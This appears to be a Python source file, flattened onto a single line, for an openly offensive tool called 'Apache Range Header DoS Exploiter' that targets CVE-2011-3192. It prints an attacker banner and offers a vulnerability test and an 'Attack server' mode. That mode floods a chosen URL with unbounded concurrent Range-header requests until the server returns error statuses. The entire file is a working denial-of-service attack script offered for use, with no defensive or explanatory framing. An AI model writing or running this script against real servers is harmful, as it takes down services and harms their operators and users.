import argparse import aiohttp import asyncio from colorama import Fore import signal class ApacheRangeDosExploiter: def __init__(self, target_url, processes): self.target_url = target_url self.processes = processes self.byte_ranges = ["0-1023", "1024-2047", "2048-3071"] self.active_tasks = [] @staticmethod def intro(): print(Fore.CYAN + '____________________________') print(Fore.CYAN + '| Exploit by futurefkslaves |') print(Fore.CYAN + '____________________________') print(Fore.GREEN + '| Please select options |') print(Fore.YELLOW + '| 1. Test CVE-2011-3192 |') print(Fore.RED + '| 2. Attack server |') print(Fore.RED + '| enter CTRL+C for exit |') print(Fore.RED + '_____________________________') async def test_server_vulnerability(self): async with aiohttp.ClientSession() as session: for byte_range in self.byte_ranges: headers = {"Range": "bytes=" + byte_range} try: async with session.get(self.target_url, headers=headers) as response: if response.status == 206: print(Fore.GREEN + f"Server is vulnerable to CVE-2011-3192") else: print(Fore.RED + f"Server is not vulnerable with byte range: {byte_range}") except aiohttp.ClientError as e: print(Fore.RED + f"Error occurred while testing byte range {byte_range}: {e}") async def exploit_byte_range(self, session, byte_range): headers = {"Range": "bytes=" + byte_range} try: while True: async with session.get(self.target_url, headers=headers) as response: if response.status == 206: print(Fore.GREEN + f"Successfully attacked") elif response.status in [500, 404, 400, 502]: print(Fore.YELLOW + f"Server down with status code {response.status}") return else: print(Fore.RED + f"Request failed") except aiohttp.ClientError as e: print(Fore.RED + f"Error occurred while sending request in ({byte_range}): {e}") async def exploit_apache_range_dos(self): async with aiohttp.ClientSession() as session: tasks = [] for _ in range(self.processes): for byte_range in self.byte_ranges: task = asyncio.create_task(self.exploit_byte_range(session, byte_range)) tasks.append(task) try: await asyncio.gather(*tasks) except asyncio.CancelledError: pass def exit_handler(signum, frame): print(Fore.RED + "Exiting...") for task in exploiter.active_tasks: task.cancel() loop.stop() raise SystemExit if __name__ == "__main__": loop = asyncio.get_event_loop() parser = argparse.ArgumentParser(description="Apache Range Header DoS Exploiter") parser.add_argument("target", help="Target URL to test/exploit") parser.add_argument("processes", type=int, help="Number of concurrent attack processes") args = parser.parse_args() exploiter = ApacheRangeDosExploiter(args.target.strip(), args.processes) exploiter.intro() signal.signal(signal.SIGINT, exit_handler) try: option = input("Enter the option : ").strip() except KeyboardInterrupt: raise SystemExit if option == "1": try: loop.run_until_complete(exploiter.test_server_vulnerability()) except Exception: raise SystemExit elif option == "2": try: loop.run_until_complete(exploiter.exploit_apache_range_dos()) except Exception: raise SystemExit else: print(Fore.RED + "Invalid option. Please select a valid option.") loop.run_until_complete(asyncio.gather(*exploiter.active_tasks))